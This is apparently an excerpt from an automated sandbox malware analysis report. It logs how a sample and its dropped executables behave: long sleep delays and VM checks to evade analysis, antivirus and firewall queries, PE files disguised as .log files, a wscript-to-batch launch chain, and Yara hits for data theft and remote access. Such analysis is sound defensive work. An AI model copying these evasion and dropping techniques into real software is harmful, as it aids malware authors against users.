                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -594688s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -594563s >= -30000s
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Evasive API call chain: GetLocalTime,DecisionNodesgraph_0-23646
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 600000
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599878
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599750
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599641
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599516
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599391
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599281
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 3600000
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599172
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599062
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598953
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598843
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598734
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598625
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598515
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598406
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598297
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598163
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598047
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597813
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597703
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597594
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597484
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597375
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597266
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597156
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597047
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596828
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596719
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596609
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596500
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596391
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596281
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596172
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596063
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595813
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595688
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595563
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595453
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595344
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595234
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595125
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595015
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594906
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594797
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594688
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594563
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Window / User API: threadDelayed 1176
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Window / User API: threadDelayed 8586
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eQQkRcVr.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SoilvDeL.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BhRGcQzx.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gRySjyoH.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BfMGYDNR.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vnjhvXId.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ESwXjeKp.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GbOXfjDL.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XieCzWia.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\egSCbkdO.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hLTAIczh.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jTkAEhsC.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sCEQoKxk.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MTqwIPIz.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KWPomPtF.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pwLIWFpU.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NBQmTGPX.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qtmQsFEO.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fNssmckm.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lGVRPIpa.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zdaXCUIW.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BnwYCmoX.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GVjFENOl.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QJNvoZJT.log
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HJnNqbKj.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eOLjNPjM.log
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 30000
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 600000
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599878
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599750
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599641
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599516
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599391
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599281
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 3600000
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599172
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 599062
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598953
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598843
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598734
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598625
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598515
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598406
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598297
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598163
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 598047
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597813
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597703
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597594
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597484
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597375
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597266
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597156
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 597047
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596828
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596719
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596609
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596500
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596391
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596281
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596172
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 596063
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595938
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595813
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595688
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595563
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595453
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595344
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595234
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595125
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 595015
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594906
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594797
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594688
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Thread delayed: delay time: 594563
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe API call chain: ExitProcess graph end node graph_0-23875
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user\Documents\desktop.ini
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user\AppData\Local\Temp
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user\AppData
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user\AppData\Local
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File opened: C:\Users\user\Desktop\desktop.ini
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2003620547.0000000002C13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56d
                                  Source: o9jDrpZrgR.exe, 00000000.00000002.2005588333.0000000002C13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware18NDMH1XWin32_VideoControllerY9NW_VBFVideoController120060621000000.000000-00017497634display.infMSBDA7KTEMOCRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colorsS2W36O4K
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B379000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089E6A3 VirtualQuery,GetSystemInfo,0_2_0089E6A3
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0088A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0088A69B
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0089C220
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_008AB348 FindFirstFileExA,0_2_008AB348
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_008A7DEE mov eax, dword ptr fs:[00000030h] 0_2_008A7DEE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089F838
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_008AC030 GetProcessHeap,0_2_008AC030
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Process token adjusted: Debug
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Process token adjusted: Debug
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Memory allocated: page read and write | page guard
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089F838
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089F9D5 SetUnhandledExceptionFilter,0_2_0089F9D5
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0089FBCA
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_008A8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008A8EBD
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0089AF0F
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Queries volume information: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe VolumeInformation
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Queries volume information: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe VolumeInformation
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089F654 cpuid 0_2_0089F654
                                  Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0089DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exe Code function: 0_2_0088B146 GetVersionExW,0_2_0088B146
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B403000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                  Stealing of Sensitive Information

                                  Source: Yara match File source: o9jDrpZrgR.exe, type: SAMPLE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED

                                  Remote Access Functionality

                                  Source: Yara match File source: o9jDrpZrgR.exe, type: SAMPLE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
